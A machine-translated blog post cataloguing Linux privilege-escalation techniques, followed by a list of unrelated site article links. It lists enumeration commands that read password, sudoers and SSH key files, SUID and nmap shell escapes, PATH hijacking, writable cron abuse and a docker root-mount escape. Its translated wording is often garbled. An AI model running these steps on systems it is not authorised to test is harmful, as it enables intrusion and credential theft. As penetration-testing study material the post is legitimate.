Summary of the right raising of Linux

Chang'an rebellion 2020-11-09 19:54:41
summary right raising linux

Reference link :
The essence of penetration is information collection , The first step is to collect information as much as possible . The general idea is to search for available documents through information collection / Script / Software / user / Kernel vulnerability / Malicious hijacking / Platform specific vulnerabilities / Frame loopholes / Components / etc. , Write or execute malicious commands / Script /shell/ Add high privilege users , Mention right to success , And then make further use of .
On the target machine , The general information to be collected is as follows :

kernel , operating system , Equipment information

uname -a Print all available system information
uname -r Kernel version
uname -n System host name .
uname -m Check out the system kernel architecture (64 position /32 position )
hostname System host name
cat /proc/version Kernel information
cat /etc/*-release Distribute information
cat /etc/issue Distribute information
cat /proc/cpuinfo CPU Information
cat /etc/lsb-release # Debian
cat /etc/redhat-release # Redhat
ls /boot | grep vmlinuz-

Users and groups

cat /etc/passwd List all users on the system
cat /var/mail/root
cat /var/spool/mail/root
cat /etc/group List all groups on the system
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' List all super user accounts
whoami View the current user
w Who is currently logged in , What are they doing
last The list of the last logged in users
lastlog Last login information for all users
lastlog –u %username% Information about the last login of the specified user
lastlog |grep -v "Never" The end of previous login users

User permission information

whoami Current user name
id Current user information
cat /etc/sudoers Who is allowed to use root execute
sudo -l The current user can use root Identity execution operation

environmental information

env Show environment variables
set Real environment variables
echo %PATH Path information
history Display the historical command record of the current user
pwd Output working directory
cat /etc/profile Show default system variables
cat /etc/shells Show available shellrc
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout

Processes and services

ps aux
ps -ef
cat /etc/services

View to root Running process

ps aux | grep root
ps -ef | grep root

Check the installed software

ls -alh /usr/bin/
ls -alh /sbin/
ls -alh /var/cache/yum/
dpkg -l

service / plug-in unit

Check for unsafe service configuration , And some plug-ins with vulnerabilities .

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^. r./

Planning tasks

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Whether there is clear text to store the user password

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find , -name "*.php" -print0 | xargs -0 grep -i -n "var $password"

Yes no ssh Private key

cat ~/.ssh/authorized_keys
cat ~/.ssh/
cat ~/.ssh/identity
cat ~/.ssh/
cat ~/.ssh/id_rsa
cat ~/.ssh/
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/
cat /etc/ssh/ssh_host_key

View other users or hosts communicating with the current machine

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on

Log files

cat /var/log/boot.log
cat /var/log/cron
cat /var/log/syslog
cat /var/log/wtmp
cat /var/run/utmp
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log,, mail.log, mail.warn, messages, syslog, udev, wtmp

Interactive shell

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

The right to draw SUID && GUID

Reference material

find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in locate -r "bin$"; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null

View writable / Perform directory

find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders

find / -perm -o x -type d 2>/dev/null # world-executable folders

find / ( -perm -o w -perm -o x ) -type d 2>/dev/null # world-writeable & executable folders

Check the installed tools

find / -name perl*
find / -name python*
find / -name gcc*

With the above information collected as the basis , To facilitate the implementation of specific means of raising rights .

The kernel authorization vulnerability

If the version of the target machine is too low , Kernel vulnerability privilege is the easiest way to think of . because kali Built in exploit-db Local vulnerability of the replica library , have access to searchsploit Command to quickly retrieve kernel version response vulnerability .
 picture .png
By the way, the classic dirty cow loophole ,CVE-2016-5195.
There are some pitfalls in the kernel exploit process , The most obvious is the environmental problem , Because I don't know what the environment on the target machine lacks , Most of the time, it's very smooth to compile and run locally , But there will always be some inexplicable errors on the target machine . And a lot exp It's not very stable , If you are not careful when you raise the right, the target machine will collapse , Therefore, it is better to use the kernel power as the last card .

suid Raise the right

suid The full name is Set owner User ID up on execution. This is a Linux Give an executable a property . Other users can use the program owner when executing the program / Group permissions . It should be noted that , Only the owner of the program is 0 No. or other super user, At the same time suid jurisdiction , Then you can raise your rights .
 picture .png
The following command can find all of the SUID Executable file .

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

 picture .png
such as nmap The old version had a feature , Users can run in interactive mode nmap, And escape to shell. If nmap Set up SUID position , It will take root Permission to run , We can access it through its interaction mode “root”shell.

$ nmap –interactive - function nmap Interactive mode
$ !sh - Allow from nmap shell Escape to the system shell

 picture .png

Environmental variables are weighted

$PATH yes Linux And the class Unix Environment variables in the operating system , It specifies the bin and sbin Catalog . When the user runs any command on the terminal , It is to shell Request , Search for executable files with the help of environment variables in response to user commands . Super users usually have /sbin and /usr /sbin entry , For easy execution of system management commands .
Use echo The command can easily view the environment variables related to the current user .
 picture .png
You need to pay attention to whether the environment variable contains ".", If there is one, it means that binaries are executed preferentially from the current directory / Script . for instance , For example, we all know ls A command is a command that lists the directory file in which it is located , But when we add "." after , And there is an executable in the current directory ls When you file , We're typing on the command line ls The result of the command changes .
Create a new one ls file
 picture .png
Add... To the environment variable "."
 picture .png
Type in the current directory ls command
 picture .png
Visible knock ls What the order is actually "./ls" This command , That is to execute the current directory named ls The executable of .
According to this, we can and have suid Permission of the file combined use , Such as suid Call a system command , You can hijack this command by modifying the environment variable , And construct a malicious file to make the program execute the desired result , Please refer to the link :

Plan tasks and raise rights

There may be some scheduled tasks in the system , Generally these tasks are performed by crontab To manage , Have the permissions of the user . Not root Users with permissions are not allowed to list root User's planned task . however /etc/ Planned tasks of internal system can be listed .

ls -l /etc/cron*

 picture .png
Default these programs to root Permissions to perform , If you are lucky to meet an administrator who configures the script to be writable by any user , We can modify the script and wait for the connection rootshell 了 .

Using third party services

Some server services will be configured to be intranet or local . By attacking them we have access to more sensitive documents , Or lucky enough to meet a remote root Loophole .

netstat -antup# Check out a variety of Web Services 

If multiple users use docker In the case of sharing a machine , And the current user has docker Group permissions , You can directly run an image to get the image inside root jurisdiction , To modify the outside of the mirror /etc/passwd Right to come .

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
cat /etc/passwd

docker Inside /etc/passwd And the outside /etc/passwd equally , therefore , You can add a user directly to it . To realize the right of withdrawal .
 picture .png
Other third party software and services can refer to the link :
In addition to the above , There are many more in practical application , For example, direct sudo, Or from shadow I got it in the file hash Crack , Or all sorts of guesses root password . In short, we should sort out the system , Go deep into the essence , Flexible use of .

本文为[Chang'an rebellion]所创,转载请带上原文链接,感谢

  1. 【计算机网络 12(1),尚学堂马士兵Java视频教程
  2. 【程序猿历程,史上最全的Java面试题集锦在这里
  3. 【程序猿历程(1),Javaweb视频教程百度云
  4. Notes on MySQL 45 lectures (1-7)
  5. [computer network 12 (1), Shang Xuetang Ma soldier java video tutorial
  6. The most complete collection of Java interview questions in history is here
  7. [process of program ape (1), JavaWeb video tutorial, baidu cloud
  8. Notes on MySQL 45 lectures (1-7)
  9. 精进 Spring Boot 03:Spring Boot 的配置文件和配置管理,以及用三种方式读取配置文件
  10. Refined spring boot 03: spring boot configuration files and configuration management, and reading configuration files in three ways
  11. 精进 Spring Boot 03:Spring Boot 的配置文件和配置管理,以及用三种方式读取配置文件
  12. Refined spring boot 03: spring boot configuration files and configuration management, and reading configuration files in three ways
  13. 【递归,Java传智播客笔记
  14. [recursion, Java intelligence podcast notes
  15. [adhere to painting for 386 days] the beginning of spring of 24 solar terms
  16. K8S系列第八篇(Service、EndPoints以及高可用kubeadm部署)
  17. K8s Series Part 8 (service, endpoints and high availability kubeadm deployment)
  18. 【重识 HTML (3),350道Java面试真题分享
  19. 【重识 HTML (2),Java并发编程必会的多线程你竟然还不会
  20. 【重识 HTML (1),二本Java小菜鸟4面字节跳动被秒成渣渣
  21. [re recognize HTML (3) and share 350 real Java interview questions
  22. [re recognize HTML (2). Multithreading is a must for Java Concurrent Programming. How dare you not
  23. [re recognize HTML (1), two Java rookies' 4-sided bytes beat and become slag in seconds
  24. 造轮子系列之RPC 1:如何从零开始开发RPC框架
  25. RPC 1: how to develop RPC framework from scratch
  26. 造轮子系列之RPC 1:如何从零开始开发RPC框架
  27. RPC 1: how to develop RPC framework from scratch
  28. 一次性捋清楚吧,对乱糟糟的,Spring事务扩展机制
  29. 一文彻底弄懂如何选择抽象类还是接口,连续四年百度Java岗必问面试题
  30. Redis常用命令
  31. 一双拖鞋引发的血案,狂神说Java系列笔记
  32. 一、mysql基础安装
  33. 一位程序员的独白:尽管我一生坎坷,Java框架面试基础
  34. Clear it all at once. For the messy, spring transaction extension mechanism
  35. A thorough understanding of how to choose abstract classes or interfaces, baidu Java post must ask interview questions for four consecutive years
  36. Redis common commands
  37. A pair of slippers triggered the murder, crazy God said java series notes
  38. 1、 MySQL basic installation
  39. Monologue of a programmer: despite my ups and downs in my life, Java framework is the foundation of interview
  40. 【大厂面试】三面三问Spring循环依赖,请一定要把这篇看完(建议收藏)
  41. 一线互联网企业中,springboot入门项目
  42. 一篇文带你入门SSM框架Spring开发,帮你快速拿Offer
  43. 【面试资料】Java全集、微服务、大数据、数据结构与算法、机器学习知识最全总结,283页pdf
  44. 【leetcode刷题】24.数组中重复的数字——Java版
  45. 【leetcode刷题】23.对称二叉树——Java版
  46. 【leetcode刷题】22.二叉树的中序遍历——Java版
  47. 【leetcode刷题】21.三数之和——Java版
  48. 【leetcode刷题】20.最长回文子串——Java版
  49. 【leetcode刷题】19.回文链表——Java版
  50. 【leetcode刷题】18.反转链表——Java版
  51. 【leetcode刷题】17.相交链表——Java&python版
  52. 【leetcode刷题】16.环形链表——Java版
  53. 【leetcode刷题】15.汉明距离——Java版
  54. 【leetcode刷题】14.找到所有数组中消失的数字——Java版
  55. 【leetcode刷题】13.比特位计数——Java版
  56. oracle控制用户权限命令
  57. 三年Java开发,继阿里,鲁班二期Java架构师
  58. Oracle必须要启动的服务
  59. 万字长文!深入剖析HashMap,Java基础笔试题大全带答案
  60. 一问Kafka就心慌?我却凭着这份,图灵学院vip课程百度云